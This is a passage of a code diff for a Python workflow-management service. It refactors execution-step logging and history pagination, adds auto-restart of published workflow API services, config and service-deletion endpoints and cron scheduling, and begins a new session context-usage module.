+            node_id=step_dict.get("node_id"),
+            global_step_index=step_count,
+            inputs=step_dict.get("inputs"),
+            outputs=step_dict.get("outputs"),
+        )
+        execution_summary.update({
+            "stepCount": step_count,
             "currentNodeId": step_dict.get("node_id"),
             "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
             "currentPhase": "running",
-            "currentStepIndex": len(step_history),
+            "currentStepIndex": step_count,
+            "loopProgress": loop_progress,
+            "updatedAt": int(time.time() * 1000),
         })
+        try:
+            asyncio.run_coroutine_threadsafe(
+                record_execution_step(exec_id, step_count, step_dict),
+                loop,
+            ).result(timeout=5)
+        except Exception as exc:
+            log.warning("workflow.execution_step.write_failed", {
+                "exec_id": exec_id,
+                "step_index": step_count,
+                "error": str(exc),
+            })
+        if step_count % _PROGRESS_FLUSH_EVERY_STEPS == 0:
+            _write_progress({
+                "stepCount": step_count,
+                "currentNodeId": step_dict.get("node_id"),
+                "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
+                "currentPhase": "running",
+                "currentStepIndex": step_count,
+                "loopProgress": loop_progress,
+                "updatedAt": int(time.time() * 1000),
+            })
+
+    async def _flush_pending_step() -> None:
+        if pending_step_index is None or pending_step is None:
+            return
+        try:
+            await record_execution_step(exec_id, pending_step_index, pending_step)
+        except Exception as exc:
+            log.warning("workflow.pending_step.write_failed", {
+                "exec_id": exec_id,
+                "step_index": pending_step_index,
+                "error": str(exc),
+            })
 
     try:
         result: RunWorkflowResult = await asyncio.to_thread(
@@ -646,32 +1148,32 @@ def _on_step_complete(step_result) -> None:
         )
 
         duration = time.time() - start_time
-        current_data = await Storage.read(exec_key)
-        if not isinstance(current_data, dict):
-            # Defensive: the execution record could be missing if it was
-            # trimmed/cleaned up mid-run.  Rebuild a baseline so the final
-            # status write still succeeds rather than blowing up.
-            current_data = {"id": exec_id, "workflowId": workflow_id}
+        current_data = dict(execution_summary)
         status_value, error_message = _resolve_execution_outcome(result)
         if cancel_event.is_set() and status_value == "success":
             status_value = "cancelled"
             error_message = error_message or f"Run cancelled: run_id={result.run_id or exec_id}"
-        # ``result.history`` is the engine-side authoritative history (not
-        # yet compacted), while ``step_history`` was already compacted in
-        # ``_on_step_complete``.  Prefer the former when available, then
-        # run it through ``compact_history_for_storage`` so the persisted
-        # row stays small in either branch.
+        # ``record_execution_result`` backfills this compacted history into
+        # append-only step rows, then stores only the summary row.
+        final_history = compact_history_for_storage(result.history)
+        if status_value == "cancelled" and not final_history:
+            await _flush_pending_step()
+        final_steps = result.steps
+        if pending_step_index is not None:
+            final_steps = max(final_steps, pending_step_index)
         current_data.update({
             "outputResults": compact_outputs_for_storage(result.outputs),
             "status": status_value,
             "finishedAt": int(time.time() * 1000),
             "duration": duration,
-            "executionLog": compact_history_for_storage(result.history) or list(step_history),
+            "executionLog": final_history,
+            "stepCount": final_steps,
             "errorMessage": error_message,
             "currentNodeId": result.last_node_id,
             "currentNodeType": current_data.get("currentNodeType"),
             "currentPhase": status_value,
-            "currentStepIndex": result.steps,
+            "currentStepIndex": final_steps,
+            "updatedAt": int(time.time() * 1000),
         })
 
         await _record_execution_result(workflow_id, exec_id, current_data)
@@ -683,16 +1185,16 @@ def _on_step_complete(step_result) -> None:
         })
     except Exception as exc:
         duration = time.time() - start_time
-        current_data = await Storage.read(exec_key)
-        if not isinstance(current_data, dict):
-            current_data = {"id": exec_id, "workflowId": workflow_id}
+        current_data = dict(execution_summary)
         current_data.update({
             "status": "cancelled" if cancel_event.is_set() else "error",
             "finishedAt": int(time.time() * 1000),
             "duration": duration,
             "errorMessage": str(exc),
-            "executionLog": list(step_history),
+            "executionLog": [],
+            "stepCount": step_count,
             "currentPhase": "cancelled" if cancel_event.is_set() else "error",
+            "updatedAt": int(time.time() * 1000),
         })
         await _record_execution_result(workflow_id, exec_id, current_data)
         log.error("workflow.execute.error", {
@@ -804,6 +1306,7 @@ async def create_workflow(req: WorkflowCreateRequest):
         meta = {
             "id": workflow_id,
             "name": req.name,
+            "nameI18n": req.name_i18n,
             "description": req.description,
             "category": req.category or "default",
             "status": "draft",
@@ -819,6 +1322,7 @@ async def create_workflow(req: WorkflowCreateRequest):
             **meta,
             "workflowJson": req.workflow_json,
             "markdownContent": None,
+            "editMarkdownContent": None,
             "stats": stats,
             "source": source,
         }
@@ -876,6 +1380,8 @@ async def update_workflow(workflow_id: str, req: WorkflowUpdateRequest):
 
         if req.name is not None:
             data["name"] = req.name
+        if req.name_i18n is not None:
+            data["nameI18n"] = req.name_i18n
         if req.description is not None:
             data["description"] = req.description
         if req.category is not None:
@@ -888,14 +1394,25 @@ async def update_workflow(workflow_id: str, req: WorkflowUpdateRequest):
                 workflow_json = req.workflow_json
             except Exception as e:
                 raise HTTPException(status_code=400, detail=f"Invalid workflow JSON: {str(e)}")
-
+        if req.markdown_content is not None:
+            markdown_content = req.markdown_content
+        elif req.edit_markdown_content is not None:
+            markdown_content = req.edit_markdown_content
         data["updatedAt"] = int(time.time() * 1000)
 
         is_global = data.get("source") == "global"
-        _write_workflow_to_fs(workflow_id, workflow_json, data, markdown_content, global_store=is_global)
+        _write_workflow_to_fs(
+            workflow_id,
+            workflow_json,
+            data,
+            markdown_content,
+            global_store=is_global,
+        )
 
         stats = await _get_workflow_stats(workflow_id)
         data["workflowJson"] = workflow_json
+        data["markdownContent"] = markdown_content
+        data["editMarkdownContent"] = markdown_content
         data["stats"] = stats
 
         log.info("workflow.updated", {"id": workflow_id})
@@ -921,52 +1438,20 @@ async def delete_workflow(workflow_id: str):
         if not data:
             raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
 
+        # Stop runtime resources before removing the filesystem source of truth.
+        await _stop_workflow_runtime_resources(workflow_id)
+
         # Remove from filesystem (source of truth)
         _delete_workflow_from_fs(workflow_id)
 
         from flocks.hub import local as hub_local
 
-        hub_local.remove_installed_record("workflow", workflow_id)
-
-        # Clean up runtime data from Storage
         try:
-            await Storage.remove(_workflow_stats_key(workflow_id))
-        except Storage.NotFoundError:
-            pass
-
-        try:
-            exec_keys = await Storage.list("workflow_execution/")
-            for key in exec_keys:
-                try:
-                    exec_data = await Storage.read(key)
-                    if exec_data.get("workflowId") == workflow_id:
-                        await Storage.remove(key)
-                except Exception:
-                    pass
-        except Exception:
-            pass
-
-        try:
-            from flocks.ingest.syslog.manager import default_manager as _syslog_default_manager
-
-            await _syslog_default_manager.stop_workflow(workflow_id)
-        except Exception:
-            pass
-        try:
-            await Storage.remove(_syslog_config_key(workflow_id))
-        except Storage.NotFoundError:
-            pass
-
-        try:
-            from flocks.ingest.kafka.manager import default_manager as _kafka_default_manager
+            hub_local.remove_installed_record("workflow", workflow_id)
+        except Exception as exc:
+            log.warning("workflow.delete.hub_record_remove_failed", {"id": workflow_id, "error": str(exc)})
 
-            await _kafka_default_manager.stop_workflow(workflow_id)
-        except Exception:
-            pass
-        try:
-            await Storage.remove(_kafka_config_key(workflow_id))
-        except Storage.NotFoundError:
-            pass
+        await _cleanup_workflow_storage(workflow_id)
 
         log.info("workflow.deleted", {"id": workflow_id})
         await publish_event("workflow.deleted", {"id": workflow_id})
@@ -1310,11 +1795,18 @@ async def get_workflow_history(
         if not data:
             raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
 
-        # 单次查询批量读取所有 execution 记录，避免 N 次单独 read 导致超长耗时
-        all_entries = await Storage.list_entries("workflow_execution/")
+        # Keep the list endpoint on summary rows only.  Do not materialize
+        # append-only step logs here; details load them separately.
+        all_entries = await Storage.list_raw("workflow_execution/")
         executions = []
-        for _key, exec_data in all_entries:
+        workflow_marker = f'"workflowId": "{workflow_id}"'
+        compact_marker = f'"workflowId":"{workflow_id}"'
+        for _key, raw_value in all_entries:
             try:
+                head = raw_value[:500]
+                if workflow_marker not in head and compact_marker not in head:
+                    continue
+                exec_data = json.loads(raw_value)
                 if not isinstance(exec_data, dict):
                     continue
                 if exec_data.get("workflowId") != workflow_id:
@@ -1323,6 +1815,7 @@ async def get_workflow_history(
                     continue
                 if trigger_type and exec_data.get("triggerType") != trigger_type:
                     continue
+                exec_data["executionLog"] = []
                 executions.append(WorkflowExecutionResponse(**exec_data))
             except Exception as e:
                 log.warning("workflow.history.skip", {"key": _key, "error": str(e)})
@@ -1342,7 +1835,12 @@ async def get_workflow_history(
 
 
 @router.get("/workflow/{workflow_id}/history/{exec_id}", response_model=WorkflowExecutionResponse)
-async def get_execution_details(workflow_id: str, exec_id: str):
+async def get_execution_details(
+    workflow_id: str,
+    exec_id: str,
+    step_offset: int = Query(0, ge=0, alias="stepOffset"),
+    step_limit: int = Query(500, ge=0, le=1000, alias="stepLimit"),
+):
     """
     Get execution details
     
@@ -1355,6 +1853,26 @@ async def get_execution_details(workflow_id: str, exec_id: str):
         if exec_data.get("workflowId") != workflow_id:
             raise HTTPException(status_code=404, detail="Execution not found for this workflow")
         
+        if step_limit == 0:
+            inline_log = exec_data.get("executionLog")
+            inline_count = len(inline_log) if isinstance(inline_log, list) else 0
+            steps, total_steps = [], exec_data.get("stepCount") or inline_count
+        else:
+            steps, total_steps = await load_execution_steps(
+                exec_id,
+                offset=step_offset,
+                limit=step_limit,
+            )
+            if total_steps == 0:
+                legacy_steps = compact_history_for_storage(exec_data.get("executionLog"))
+                total_steps = len(legacy_steps)
+                steps = legacy_steps[step_offset:step_offset + step_limit]
+        exec_data = dict(exec_data)
+        exec_data["executionLog"] = steps
+        exec_data["stepLogOffset"] = step_offset
+        exec_data["stepLogLimit"] = step_limit
+        exec_data["stepLogTotal"] = total_steps
+        exec_data["stepCount"] = exec_data.get("stepCount") or total_steps
         return WorkflowExecutionResponse(**exec_data)
     except Storage.NotFoundError:
         raise HTTPException(status_code=404, detail=f"Execution not found: {exec_id}")
@@ -1492,6 +2010,7 @@ async def import_workflow(workflow_json: Dict[str, Any]):
             **meta,
             "workflowJson": workflow_json,
             "markdownContent": None,
+            "editMarkdownContent": None,
             "stats": stats,
             "source": "global",
         }
@@ -1542,16 +2061,170 @@ async def export_workflow(workflow_id: str):
 _API_SERVICE_PREFIX = "workflow_api_service/"
 _KAFKA_CONFIG_PREFIX = WORKFLOW_KAFKA_CONFIG_PREFIX
 _REGISTRY_PREFIX_MAIN = "workflow_registry/"
+_RUNTIME_PREFIX_MAIN = "workflow_runtime/"
 
 
 def _api_service_key(workflow_id: str) -> str:
     return f"{_API_SERVICE_PREFIX}{workflow_id}"
 
 
+def _runtime_key_main(workflow_id: str) -> str:
+    return f"{_RUNTIME_PREFIX_MAIN}{workflow_id}"
+
+
+def _workflow_id_from_api_service_key(key: Any) -> str:
+    return str(key).removeprefix(_API_SERVICE_PREFIX)
+
+
 def _kafka_config_key(workflow_id: str) -> str:
     return f"{_KAFKA_CONFIG_PREFIX}{workflow_id}"
 
 
+async def _prepare_workflow_api_registry(workflow_id: str) -> tuple[Dict[str, Any], int]:
+    """Write the current workflow snapshot to the workflow center registry."""
+    data = _read_workflow_from_fs(workflow_id)
+    if not data:
+        raise WorkflowNotFoundError(f"Workflow not found: {workflow_id}")
+
+    workflow_json = data["workflowJson"]
+    service_dir = Config.get_data_path() / "workflow-services" / "workflows" / workflow_id
+    service_dir.mkdir(parents=True, exist_ok=True)
+    workflow_path = service_dir / "workflow.json"
+    workflow_path.write_text(json.dumps(workflow_json), encoding="utf-8")
+
+    fp = hashlib.sha256(workflow_path.read_bytes()).hexdigest()
+    now_ms = int(time.time() * 1000)
+
+    existing_registry = await Storage.read(f"{_REGISTRY_PREFIX_MAIN}{workflow_id}") or {}
+    registry_entry = {
+        "workflowId": workflow_id,
+        "name": data["name"],
+        "sourceType": "main_storage",
+        "workflowPath": str(workflow_path),
+        "fingerprint": fp,
+        "publishStatus": "unpublished",
+        "registeredAt": existing_registry.get("registeredAt", now_ms),
+        "updatedAt": now_ms,
+    }
+    await Storage.write(f"{_REGISTRY_PREFIX_MAIN}{workflow_id}", registry_entry)
+    return data, now_ms
+
+
+def _workflow_api_autostart_enabled() -> bool:
+    raw = os.getenv("FLOCKS_WORKFLOW_API_AUTOSTART", "1").strip().lower()
+    return raw not in {"0", "false", "no", "off"}
+
+
+def _service_driver_from_record(service: Dict[str, Any]) -> Optional[Literal["local", "docker"]]:
+    driver = str(service.get("driver") or "").strip().lower()
+    if driver in {"local", "docker"}:
+        return driver  # type: ignore[return-value]
+    return None
+
+
+def _is_manually_stopped_service(service: Dict[str, Any]) -> bool:
+    return str(service.get("status") or "").strip().lower() == "stopped" and bool(service.get("stoppedAt"))
+
+
+async def _normalize_listed_api_service(key: Any, entry: Any) -> Optional[Dict[str, Any]]:
+    if not isinstance(entry, dict):
+        return None
+
+    service = dict(entry)
+    workflow_id = str(service.get("workflowId") or _workflow_id_from_api_service_key(key))
+    service["workflowId"] = workflow_id
+    runtime = await Storage.read(_runtime_key_main(workflow_id))
+
+    if isinstance(runtime, dict) and runtime:
+        service_url = runtime.get("serviceUrl") or service.get("serviceUrl") or ""
+        service["serviceUrl"] = service_url
+        service["invokeUrl"] = f"{service_url}/invoke" if service_url else service.get("invokeUrl", "")
+        service["status"] = "running" if runtime.get("status") in {"active", "running"} else service.get("status", "running")
+        service["driver"] = runtime.get("driver") or service.get("driver")
+        service["containerName"] = runtime.get("containerName") or service.get("containerName", "")
+        service["image"] = runtime.get("image") or service.get("image")
+        return service
+
+    status = str(service.get("status") or "").strip().lower()
+    if status in {"running", "publishing"}:
+        service["status"] = "stopped"
+        service["health"] = {
+            **(service.get("health") if isinstance(service.get("health"), dict) else {}),
+            "ok": False,
+            "stale": True,
+            "reason": "missing_runtime",
+        }
+    return service
+
+
+async def reconcile_published_workflow_api_services() -> Dict[str, int]:
+    """Restart persisted workflow API services after the main server restarts."""
+    stats = {"checked": 0, "healthy": 0, "restarted": 0, "failed": 0, "skipped": 0}
+    if not _workflow_api_autostart_enabled():
+        return stats
+
+    keys = await Storage.list_keys(_API_SERVICE_PREFIX)
+    for key in keys:
+        service = await Storage.read(key)
+        if not isinstance(service, dict):
+            continue
+
+        workflow_id = str(service.get("workflowId") or _workflow_id_from_api_service_key(key))
+        if _is_manually_stopped_service(service):
+            stats["skipped"] += 1
+            continue
+
+        stats["checked"] += 1
+        try:
+            health = await get_workflow_health(workflow_id)
+        except Exception as exc:
+            health = {"ok": False, "error": str(exc)}
+
+        if health.get("ok"):
+            service["status"] = "running"
+            service["health"] = health
+            await Storage.write(_api_service_key(workflow_id), service)
+            stats["healthy"] += 1
+            continue
+
+        now_ms = int(time.time() * 1000)
+        service["lastStartAttemptAt"] = now_ms
+        try:
+            data, _ = await _prepare_workflow_api_registry(workflow_id)
+            active_record = await publish_workflow(
+                workflow_id,
+                image=service.get("image") or None,
+                driver=_service_driver_from_record(service),
+                api_key=service.get("apiKey") or None,
+            )
+
+            service_url = active_record.get("serviceUrl", "")
+            service.update({
+                "workflowId": workflow_id,
+                "workflowName": service.get("workflowName") or data["name"],
+                "serviceUrl": service_url,
+                "invokeUrl": f"{service_url}/invoke",
+                "apiKey": service.get("apiKey") or active_record.get("apiKey"),
+                "status": "running",
+                "containerName": active_record.get("containerName", ""),
+                "driver": active_record.get("driver") or service.get("driver"),
+                "image": active_record.get("image") or service.get("image"),
+                "restartedAt": int(time.time() * 1000),
+            })
+            service.pop("lastStartError", None)
+            service["health"] = {"ok": True, "restarted": True}
+            await Storage.write(_api_service_key(workflow_id), service)
+            stats["restarted"] += 1
+        except Exception as exc:
+            service["status"] = "error"
+            service["health"] = health
+            service["lastStartError"] = str(exc)
+            await Storage.write(_api_service_key(workflow_id), service)
+            log.warning("workflow.api.autostart_failed", {"id": workflow_id, "error": str(exc)})
+            stats["failed"] += 1
+    return stats
+
+
 class WorkflowServiceResponse(BaseModel):
     workflowId: str
     workflowName: str
@@ -1562,6 +2235,7 @@ class WorkflowServiceResponse(BaseModel):
     publishedAt: int
     containerName: Optional[str] = None
     driver: Optional[Literal["local", "docker"]] = None
+    image: Optional[str] = None
 
 
 class KafkaConfigRequest(BaseModel):
@@ -1625,6 +2299,7 @@ class WorkflowPollerConfigRequest(BaseModel):
 
     enabled: bool = False
     intervalSeconds: int = Field(30, ge=1)
+    cronExpression: Optional[str] = None
     timeoutSeconds: int = Field(7200, ge=1)
     noOverlap: bool = True
     inputs: Dict[str, Any] = Field(default_factory=dict)
@@ -1655,49 +2330,27 @@ async def publish_workflow_as_api(
     starts the selected runtime, and returns the service URL and generated API key.
     """
     try:
-        data = _read_workflow_from_fs(workflow_id)
-        if not data:
-            raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
-
-        workflow_json = data["workflowJson"]
-
-        # Write workflow JSON to a stable path that center.py can read
-        service_dir = Config.get_data_path() / "workflow-services" / "workflows" / workflow_id
-        service_dir.mkdir(parents=True, exist_ok=True)
-        workflow_path = service_dir / "workflow.json"
-        workflow_path.write_text(json.dumps(workflow_json), encoding="utf-8")
+        data, now_ms = await _prepare_workflow_api_registry(workflow_id)
 
-        fp = hashlib.sha256(workflow_path.read_bytes()).hexdigest()
-        now_ms = int(time.time() * 1000)
-
-        existing_registry = await Storage.read(f"{_REGISTRY_PREFIX_MAIN}{workflow_id}") or {}
-        registry_entry = {
-            "workflowId": workflow_id,
-            "name": data["name"],
-            "sourceType": "main_storage",
-            "workflowPath": str(workflow_path),
-            "fingerprint": fp,
-            "publishStatus": "unpublished",
-            "registeredAt": existing_registry.get("registeredAt", now_ms),
-            "updatedAt": now_ms,
-        }
-        await Storage.write(f"{_REGISTRY_PREFIX_MAIN}{workflow_id}", registry_entry)
+        # Preserve existing API key across re-publishes so callers don't break.
+        # The runtime must receive the same key before it starts so /invoke can
+        # enforce the key returned to callers.
+        existing_service = await Storage.read(_api_service_key(workflow_id)) or {}
+        api_key = existing_service.get("apiKey") or (uuid.uuid4().hex + uuid.uuid4().hex)
 
         # Use center.py to publish the selected runtime.
         active_record = await publish_workflow(
             workflow_id,
             image=req.image if req else None,
             driver=req.driver if req else None,
+            api_key=api_key,
         )
 
-        # Preserve existing API key across re-publishes so callers don't break
-        existing_service = await Storage.read(_api_service_key(workflow_id)) or {}
-        api_key = existing_service.get("apiKey") or (uuid.uuid4().hex + uuid.uuid4().hex)
-
         service_url = active_record.get("serviceUrl", "")
         invoke_url = f"{service_url}/invoke"
         container_name = active_record.get("containerName", "")
         driver = active_record.get("driver") or (req.driver if req else None)
+        image = active_record.get("image") or (req.image if req else None)
 
         service_info = {
             "workflowId": workflow_id,
@@ -1709,11 +2362,14 @@ async def publish_workflow_as_api(
             "publishedAt": now_ms,
             "containerName": container_name,
             "driver": driver,
+            "image": image,
         }
         await Storage.write(_api_service_key(workflow_id), service_info)
 
         log.info("workflow.api.published", {"id": workflow_id, "url": service_url})
         return service_info
+    except WorkflowNotFoundError as e:
+        raise HTTPException(status_code=404, detail=str(e))
     except HTTPException:
         raise
     except WorkflowCenterError as e:
@@ -1759,22 +2415,150 @@ async def get_workflow_service(workflow_id: str):
     Returns null if not published.
     """
     try:
-        service = await Storage.read(_api_service_key(workflow_id))
-        if isinstance(service, dict) and service.get("status") == "running":
-            try:
-                health = await get_workflow_health(workflow_id)
-            except Exception:
-                health = {}
-            if health and not health.get("ok"):
-                service["status"] = "error" if health.get("published") else "stopped"
-                service["health"] = health
-                await Storage.write(_api_service_key(workflow_id), service)
-        return service  # None / null if not found
+        return await Storage.read(_api_service_key(workflow_id))  # None / null if not found
     except Exception as e:
         log.error("workflow.service.get.error", {"id": workflow_id, "error": str(e)})
         raise HTTPException(status_code=500, detail=f"Failed to get service info: {str(e)}")
 
 
+@router.delete("/workflow/{workflow_id}/service")
+async def delete_workflow_service(workflow_id: str):
+    """Delete the stored API service configuration for a workflow."""
+    try:
+        existing = await Storage.read(_api_service_key(workflow_id))
+        if not existing:
+            raise HTTPException(status_code=404, detail="No published service found for this workflow")
+
+        try:
+            await stop_workflow_service(workflow_id)
+        except (WorkflowNotFoundError, WorkflowNotPublishedError):
+            pass
+
+        try:
+            await Storage.remove(_api_service_key(workflow_id))
+        except Storage.NotFoundError:
+            pass
+
+        log.info("workflow.api.service_deleted", {"id": workflow_id})
+        return {"ok": True, "workflowId": workflow_id}
+    except HTTPException:
+        raise
+    except Exception as e:
+        log.error("workflow.service.delete.error", {"id": workflow_id, "error": str(e)})
+        raise HTTPException(status_code=500, detail=f"Failed to delete workflow service: {str(e)}")
+
+
+@router.get("/workflow/{workflow_id}/config")
+async def get_workflow_config(workflow_id: str):
+    """Read workflow publish template from Storage, migrating config.json if needed."""
+    data = _read_workflow_from_fs(workflow_id)
+    if not data:
+        raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
+
+    config_path = _workflow_config_dir(workflow_id, data) / "config.json"
+    runtime = await _build_workflow_integration_runtime(workflow_id, data)
+    try:
+        config, source = await _load_workflow_integration_config_template(workflow_id, data, config_path)
+        if config is not None:
+            return {
+                "exists": True,
+                "path": str(config_path),
+                "storageKey": _workflow_integration_config_key(workflow_id),
+                "source": source,
+                "config": config,
+                "runtime": runtime,
+            }
+
+        config = await _build_workflow_integration_config(workflow_id, data)
+        return {
+            "exists": False,
+            "path": str(config_path),
+            "storageKey": _workflow_integration_config_key(workflow_id),
+            "source": "generated",
+            "config": config,
+            "runtime": runtime,
+        }
+    except HTTPException:
+        raise
+    except Exception as exc:
+        log.error("workflow.config.get.error", {"id": workflow_id, "error": str(exc)})
+        raise HTTPException(status_code=500, detail=f"Failed to read workflow config: {str(exc)}")
+
+
+@router.put("/workflow/{workflow_id}/config")
+async def update_workflow_config(
+    workflow_id: str,
+    config: Dict[str, Any] = Body(...),
+):
+    """Update the publish template in Storage without mutating runtime state."""
+    data = _read_workflow_from_fs(workflow_id)
+    if not data:
+        raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
+
+    try:
+        normalized_config = _normalize_workflow_integration_config_template(workflow_id, data, config)
+        config_path = _workflow_config_dir(workflow_id, data) / "config.json"
+        await Storage.write(_workflow_integration_config_key(workflow_id), normalized_config)
+        log.info("workflow.config.updated", {
+            "id": workflow_id,
+            "storage_key": _workflow_integration_config_key(workflow_id),
+        })
+        return {
+            "ok": True,
+            "exists": True,
+            "path": str(config_path),
+            "storageKey": _workflow_integration_config_key(workflow_id),
+            "source": "storage",
+            "config": normalized_config,
+            "runtime": await _build_workflow_integration_runtime(workflow_id, data),
+        }
+    except HTTPException:
+        raise
+    except Exception as exc:
+        log.error("workflow.config.update.error", {"id": workflow_id, "error": str(exc)})
+        raise HTTPException(status_code=500, detail=f"Failed to update workflow config: {str(exc)}")
+
+
+@router.post("/workflow/{workflow_id}/config/sync")
+async def sync_workflow_config(workflow_id: str):
+    """Ensure a publish template exists in Storage, migrating config.json if present."""
+    data = _read_workflow_from_fs(workflow_id)
+    if not data:
+        raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
+    try:
+        config_path = _workflow_config_dir(workflow_id, data) / "config.json"
+        config, source = await _load_workflow_integration_config_template(workflow_id, data, config_path)
+        if config is not None:
+            return {
+                "ok": True,
+                "path": str(config_path),
+                "exists": True,
+                "storageKey": _workflow_integration_config_key(workflow_id),
+                "source": source,
+                "config": config,
+                "runtime": await _build_workflow_integration_runtime(workflow_id, data),
+            }
+
+        config = await _build_workflow_integration_config(workflow_id, data)
+        await Storage.write(_workflow_integration_config_key(workflow_id), config)
+        log.info("workflow.config.synced", {
+            "id": workflow_id,
+            "storage_key": _workflow_integration_config_key(workflow_id),
+        })
+        return {
+            "ok": True,
+            "path": str(config_path),
+            "exists": True,
+            "storageKey": _workflow_integration_config_key(workflow_id),
+            "source": "storage",
+            "config": config,
+            "runtime": await _build_workflow_integration_runtime(workflow_id, data),
+        }
+    except Exception as exc:
+        log.error("workflow.config.sync.error", {"id": workflow_id, "error": str(exc)})
+        raise HTTPException(status_code=500, detail=f"Failed to sync workflow config: {str(exc)}")
+
+
 @router.get("/workflow-services")
 async def list_workflow_services():
     """
@@ -1785,8 +2569,9 @@ async def list_workflow_services():
         services = []
         for key in keys:
             entry = await Storage.read(key)
-            if entry:
-                services.append(entry)
+            service = await _normalize_listed_api_service(key, entry)
+            if service:
+                services.append(service)
         services.sort(key=lambda s: s.get("publishedAt", 0), reverse=True)
         return services
     except Exception as e:
@@ -2197,10 +2982,25 @@ async def save_workflow_poller_config(workflow_id: str, req: WorkflowPollerConfi
         if not data:
             raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
 
+        cron_expression = (req.cronExpression or "").strip()
+        trigger_source: Dict[str, Any]
+        if cron_expression:
+            trigger_source = {
+                "mode": "cron",
+                "intervalSeconds": req.intervalSeconds,
+                "cron": cron_expression,
+            }
+        else:
+            trigger_source = {
+                "mode": "interval",
+                "intervalSeconds": req.intervalSeconds,
+            }
+
         config = {
             "workflowId": workflow_id,
             "enabled": req.enabled,
             "intervalSeconds": req.intervalSeconds,
+            "cronExpression": cron_expression or None,
             "timeoutSeconds": req.timeoutSeconds,
             "noOverlap": req.noOverlap,
             "inputs": req.inputs,
@@ -2212,10 +3012,7 @@ async def save_workflow_poller_config(workflow_id: str, req: WorkflowPollerConfi
                 "id": "schedule-default",
                 "type": "schedule",
                 "enabled": req.enabled,
-                "source": {
-                    "mode": "interval",
-                    "intervalSeconds": req.intervalSeconds,
-                },
+                "source": trigger_source,
                 "runtime": {
                     "timeoutSeconds": req.timeoutSeconds,
                     "noOverlap": req.noOverlap,
@@ -2556,11 +3353,21 @@ async def save_sample_inputs(workflow_id: str, req: SampleInputsRequest):
             workflow_json["metadata"] = {}
         workflow_json["metadata"]["sampleInputs"] = req.sampleInputs
 
-        meta = {k: v for k, v in data.items() if k not in ("workflowJson", "markdownContent", "stats", "source")}
+        meta = {
+            k: v
+            for k, v in data.items()
+            if k not in ("workflowJson", "markdownContent", "editMarkdownContent", "stats", "source")
+        }
         meta["updatedAt"] = int(time.time() * 1000)
         markdown_content = data.get("markdownContent")
         is_global = data.get("source") == "global"
-        _write_workflow_to_fs(workflow_id, workflow_json, meta, markdown_content, global_store=is_global)
+        _write_workflow_to_fs(
+            workflow_id,
+            workflow_json,
+            meta,
+            markdown_content,
+            global_store=is_global,
+        )
 
         log.info("workflow.sample_inputs.saved", {"id": workflow_id})
         return {"ok": True}
diff --git a/flocks/session/context_usage.py b/flocks/session/context_usage.py
new file mode 100644
index 000000000..35084ee92
--- /dev/null
+++ b/flocks/session/context_usage.py
@@ -0,0 +1,567 @@
+"""Session context-usage snapshot helpers.
+
+This module exposes the context usage shown by the Web UI.  Provider-reported
+usage is preferred when it reflects the current prompt, while the existing
+message/part estimator is used as the fallback for providers that do not emit
+token usage or after compaction changes the prompt shape.
+"""
+
+from __future__ import annotations
+
+import json
+from typing import Any, Dict, Iterable, List, Literal, Optional
+
+from pydantic import BaseModel, ConfigDict, Field
+
+from flocks.provider.provider import Provider
+from flocks.session.message import Message
+from flocks.session.prompt import SessionPrompt
+from flocks.session.session import SessionInfo
+from flocks.utils.log import Log
+
+
+log = Log.create(service="context-usage")
+
+UsageSource = Literal["observed", "estimated"]
+DELEGATION_TOOLS = {"delegate_task", "task"}
+ZERO_VISIBLE_SEGMENTS = {"agentDelegation"}
+
+
+class ContextUsageSegment(BaseModel):
+    """One row in the context-usage breakdown."""
+
+    model_config = ConfigDict(populate_by_name=True)
+
+    key: str
+    tokens: int = 0
+    included: bool = True
+    source: UsageSource = "estimated"
+
+
+class ContextUsageSnapshot(BaseModel):
+    """Current context usage for a session."""
+
+    model_config = ConfigDict(populate_by_name=True, by_alias=True)
+
+    session_id: str = Field(..., alias="sessionID")
+    used_tokens: int = Field(0, alias="usedTokens")
+    context_window: int = Field(0, alias="contextWindow")
+    percent: int = 0
+    source: UsageSource = "estimated"
+    last_message_id: Optional[str] = Field(None, alias="lastMessageID")
+    observed_tokens: Optional[int] = Field(None, alias="observedTokens")
+    estimated_tokens: int = Field(0, alias="estimatedTokens")
+    compacted_tokens: int = Field(0, alias="compactedTokens")
+    provider_id: Optional[str] = Field(None, alias="providerID")
+    model_id: Optional[str] = Field(None, alias="modelID")
+    segments: List[ContextUsageSegment] = Field(default_factory=list)
+    excluded_segments: List[ContextUsageSegment] = Field(default_factory=list, alias="excludedSegments")
+
+
+class _ObservedTokens(BaseModel):
+    message_id: str
+    created_ms: int
+    used_tokens: int
+    prompt_tokens: int
+
+
+def token_usage_to_dict(tokens: Any) -> Dict[str, Any]:
+    """Return a stable token dict for API/SSE payloads."""
+    if tokens is None:
+        return {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}}
+    if hasattr(tokens, "model_dump"):
+        data = tokens.model_dump()
+    elif isinstance(tokens, dict):
+        data = dict(tokens)
+    else:
+        data = dict(getattr(tokens, "__dict__", {}) or {})
+
+    cache = data.get("cache") or {}
+    if hasattr(cache, "model_dump"):
+        cache = cache.model_dump()
+    elif not isinstance(cache, dict):
+        cache = dict(getattr(cache, "__dict__", {}) or {})
+
+    return {
+        "input": _coerce_int(data.get("input")),
+        "output": _coerce_int(data.get("output")),
+        "reasoning": _coerce_int(data.get("reasoning")),
+        "cache": {
+            "read": _coerce_int(cache.get("read")),
+            "write": _coerce_int(cache.get("write")),
+        },
+    }
+
+
+async def build_context_usage_snapshot(
+    session_id: str,
+    *,
+    session: Optional[SessionInfo] = None,
+    provider_id: Optional[str] = None,
+    model_id: Optional[str] = None,
+) -> ContextUsageSnapshot:
+    """Build a context-usage snapshot for UI display.
+
+    ``usedTokens`` means the best available estimate of the current prompt
+    footprint.  If the provider emitted usage for the latest model call and no
+    later compaction mutation has changed the prompt, we use that observed
+    value.  Otherwise we fall back to ``SessionPrompt.estimate_full_context_tokens``.
+    """
+    active_messages = await Message.list(session_id)
+
+    breakdown_tokens, latest_compacted_part_ms = await _estimate_message_breakdown(
+        session_id,
